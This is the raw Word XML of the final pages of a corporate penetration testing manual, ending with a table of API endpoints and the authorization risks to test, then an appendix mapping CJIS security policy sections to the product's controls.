                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/agencies/{id}/invoices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT billing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-tenant invoice access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/admin/cad-integrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT agencyadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-agency integration leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/admin/qr-nfc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT agencyit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Role bypass — dispatcher creating codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix C — CJIS Security Policy Reference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80"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="5760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NexCort iQ Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Annual pen test by qualified firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Periodic security assessments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Quarterly automated + annual manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.10.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Penetration testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">This manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Access enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RBAC per Role Access Matrix v2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsuccessful login attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cognito account lockout after 5 failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Session lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15-minute timeout on dispatcher console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Identification and authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cognito + MFA for all RC platform roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Audit and accountability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CloudTrail + DynamoDB audit tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SAM/CloudFormation IaC, no manual changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC Incident Response Playbook (RC-SEC-IRP-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Document —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RC-SEC-PENTEST-001 v1.0  |  NexCort iQ  |  Confidential</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0DDF0" w:sz="2"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="9B91BB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  Apps on Demand LLC d/b/a NexCort iQ  |  Internal Use Only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80"/>
      <w:tblBorders>
        <w:top w:val="none"/>
        <w:left w:val="none"/>
        <w:bottom w:val="single" w:color="7C3AED" w:sz="2"/>
        <w:right w:val="none"/>
        <w:insideH w:val="single" w:color="auto" w:sz="4"/>
        <w:insideV w:val="single" w:color="auto" w:sz="4"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="6480"/>
      <w:gridCol w:w="3600"/>
    </w:tblGrid>
    <w:tr>
      <w:tc>
        <w:p>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="7C3AED"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">NEXCORT IQ</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:color w:val="9B91BB"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">  |  Penetration Testing Manual  |  RC-SEC-PENTEST-001</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:p>
          <w:pPr>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="EF4444"/>
              <w:sz w:val="14"/>
              <w:szCs w:val="14"/>
            </w:rPr>
            <w:t xml:space="preserve">CONFIDENTIAL</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RC Penetration Testing Manual</dc:title>
  <dc:creator>NexCort iQ Security Engineering</dc:creator>
  <dc:description>NexCort iQ Penetration Testing Manual RC-SEC-PENTEST-001</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-06T18:53:14.068Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-06T18:53:14.083Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>